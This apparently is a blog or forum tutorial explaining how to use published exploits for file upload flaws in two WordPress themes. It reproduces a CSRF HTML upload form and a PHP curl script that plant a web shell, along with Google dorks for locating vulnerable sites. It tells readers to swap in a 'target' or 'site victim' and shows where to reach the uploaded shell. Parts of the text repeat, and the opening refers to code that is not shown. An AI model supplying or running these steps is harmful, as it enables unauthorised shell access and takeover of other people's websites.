How to use exploit ( CSRF / Remote File upload vulnerability )
If you find exploit something like this :
How to make it works ?...
Paste in notepad & Save with HTML extension. and open with firefox / chrome / etc.. you will see form uploader button. now upload your shell/image. & Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
(PHP VERSION)
If you find exploit something like this :
How to make it works ?...
Paste in notepad & Save with PHP extension into folder ex: (exploit.php).
Example :
I have Exploit folder in C:/ directory.
upload.php <-- in script exploit is name your shell, you can rename it anything you like.
So i have upload.php and expoit.php already exist in the same folder.
I will run this script with this command (CMD) :
And you can access shell in here : http://target.com/wordpress/wp-content/uploads/[YEARS]/[MONTH]/upload.php
example :
Script Will Running With PHP Environment Variable
Many people ask : how to use exploit CSRF / Remote File upload vulnerability ?
You will find exploit in here :
You will find exploit in here :
1337day, exploit-db, packetstorm .. etc (Find it from Google)
(HTML VERSION)If you find exploit something like this :
Code:
#############################
# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/17/2013
# Infected Version: v3.x.x
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/Amplus_v3
##############################
#POC & EXPLOIT
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
#File path:
http://site.com/wordpress/wp-content/uploads/[FILE]
or
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]
######################################################################How to make it works ?...
Copy the exploit :
Code:
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
NOTE :
Change http://127.0.0.1/ with your target (site vuln you got)
And change /Amplus_v3.x.x/ with themes version in site victim.
Check wordpress path before save.
Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc
Change http://127.0.0.1/ with your target (site vuln you got)
And change /Amplus_v3.x.x/ with themes version in site victim.
Check wordpress path before save.
Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc
Paste in notepad & Save with HTML extension. and open with firefox / chrome / etc.. you will see form uploader button. now upload your shell/image. & Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
(PHP VERSION)
If you find exploit something like this :
Code:
#################################################################################
# Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/bordeaux/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/bordeaux-theme/"
# Tested on : Windows/Linux
#################################################################################
# Exploit
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
access shell : http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
#################################################################################How to make it works ?...
Copy the exploit :
Code:
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
NOTE :
YOU MUST HAVE PHP EXTENSION (ENVIRONMENT VARIABLE) PHP will running in CMD (Windows)
Change http://127.0.0.1/ with your target (site vuln you got)
Check wordpress path before save.
Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc
YOU MUST HAVE PHP EXTENSION (ENVIRONMENT VARIABLE) PHP will running in CMD (Windows)
Change http://127.0.0.1/ with your target (site vuln you got)
Check wordpress path before save.
Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc
Paste in notepad & Save with PHP extension into folder ex: (exploit.php).
Example :
upload.php <-- in script exploit is name your shell, you can rename it anything you like.
So i have upload.php and expoit.php already exist in the same folder.
I will run this script with this command (CMD) :
Code:
C:\Users\Diizzy>cd \Exploit
C:\Exploit>php exploit.phpAnd you can access shell in here : http://target.com/wordpress/wp-content/uploads/[YEARS]/[MONTH]/upload.php
example :
Code:
http://target.com/wordpress/wp-content/uploads/2013/11/upload.php Script Will Running With PHP Environment Variable 
Post a Comment